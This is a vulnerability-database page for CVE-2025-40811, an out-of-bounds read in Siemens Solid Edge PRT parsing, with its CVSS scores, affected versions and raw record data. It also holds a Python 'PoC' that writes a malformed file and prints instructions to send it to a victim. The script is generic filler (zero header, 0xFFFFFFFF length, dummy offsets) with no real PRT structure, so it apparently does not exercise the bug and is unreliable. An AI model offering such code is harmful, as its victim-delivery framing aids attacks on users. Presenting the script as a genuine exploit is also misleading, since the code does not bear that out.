Security Vulnerability Report
中文
CVE-2025-40811 CVSS 7.8 HIGH

CVE-2025-40811

Published: 2025-10-14 10:15:40
Last Modified: 2025-10-16 13:52:25
Source: [email protected]

Description

A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 14), Solid Edge SE2025 (All versions < V225.0 Update 6). The affected applications contains an out of bounds read vulnerability while parsing specially crafted PRT files. This could allow an attacker to crash the application or execute code in the context of the current process.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:siemens:solid_edge_se2024:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0001:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00010:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00011:*:*:*:*:*:* - VULNERABLE
Solid Edge SE2024 < V224.0 Update 14
Solid Edge SE2025 < V225.0 Update 6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-40811 - Siemens Solid Edge PRT File Out-of-Bounds Read PoC # This is a conceptual PoC demonstrating the vulnerability trigger mechanism # WARNING: For educational and security research purposes only import struct import sys def create_malicious_prt(filename): """ Create a malformed PRT file to trigger out-of-bounds read vulnerability in Siemens Solid Edge when parsing specially crafted PRT files. """ # PRT file header - valid Solid Edge part file signature header = b'\x00' * 16 # File header placeholder # Malicious data section with corrupted length fields # The OOB read is triggered when parser reads beyond allocated buffer # based on an inflated length value in the file structure malformed_data = struct.pack('<I', 0xFFFFFFFF) # Inflated size field causing OOB read malformed_data += b'\x41' * 4096 # Payload data # Additional corrupted structure pointers corrupted_offsets = struct.pack('<Q', 0xDEADBEEFCAFEBABE) # Invalid offset corrupted_offsets += struct.pack('<Q', 0x4141414141414141) # Another invalid offset # Combine all sections malicious_content = header + malformed_data + corrupted_offsets with open(filename, 'wb') as f: f.write(malicious_content) print(f"[+] Malicious PRT file created: {filename}") print(f"[!] Send this file to a victim using Solid Edge SE2024/SE2025") print(f"[!] When the victim opens the file, OOB read will be triggered") if __name__ == "__main__": output_file = sys.argv[1] if len(sys.argv) > 1 else "exploit.prt" create_malicious_prt(output_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40811", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:39.923", "lastModified": "2025-10-16T13:52:24.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 14), Solid Edge SE2025 (All versions < V225.0 Update 6). The affected applications contains an out of bounds read vulnerability while parsing specially crafted PRT files. This could allow an attacker to crash the application or execute code in the context of the current process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:-:*:*:*:*:*:*:*", "matchCriteriaId": "893736B3-0140-4775-8700-CB9D7719DDE5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:-:*:*:*:*:*:*", "matchCriteriaId": "A0119E8F-1FAF-4A3B-B6E9-20F78360FC82"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0001:*:*:*:*:*:*", "matchCriteriaId": "829C4AEB-7C8D-408B-A79C-8684753F45E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00010:*:*:*:*:*:*", "matchCriteriaId": "8E262AB3-8C47-430A-9D42-89317CB630C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00011:*:*:*:*:*:*", "matchCriteriaId": "94758C94-F427-480E-A9F1-109D8660C4E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00012:*:*:*:*:*:*", "matchCriteriaId": "D084D11C-08FB-4EEE-A5E3-D93C10103D2A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00013:*:*:*:*:*:*", "matchCriteriaId": "F8A834C5-1E45-4087-A3A4-C059A2C9960C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0002:*:*:*:*:*:*", "matchCriteriaId": "1E8FB23E-280D-46FD-BD44-5D4552639E00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0003:*:*:*:*:*:*", "matchCriteriaId": "CA2417A0-DD31-46FC-8D5A-9128B86C9352"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0004:*:*:*:*:*:*", "matchCriteriaId": "3CA9C494-767C-4CFA-AB07-106298B7B2C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0005:*:*:*:*:*:*", "matchCriteriaId": "C3738D73-82A5-41E4-8083-34611A6301BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0006:*:*:*:*:*:*", "matchCriteriaId": "5634352F-0DD1-4731-9E43-61D0A9A40D1B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0007:*:*:*:*:*:*", "matchCriteriaId": "32E3D549-54F0-4909-830D-BDE8CDAD5AF7"}, {"vulnerable": true, "criteria": "cpe ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.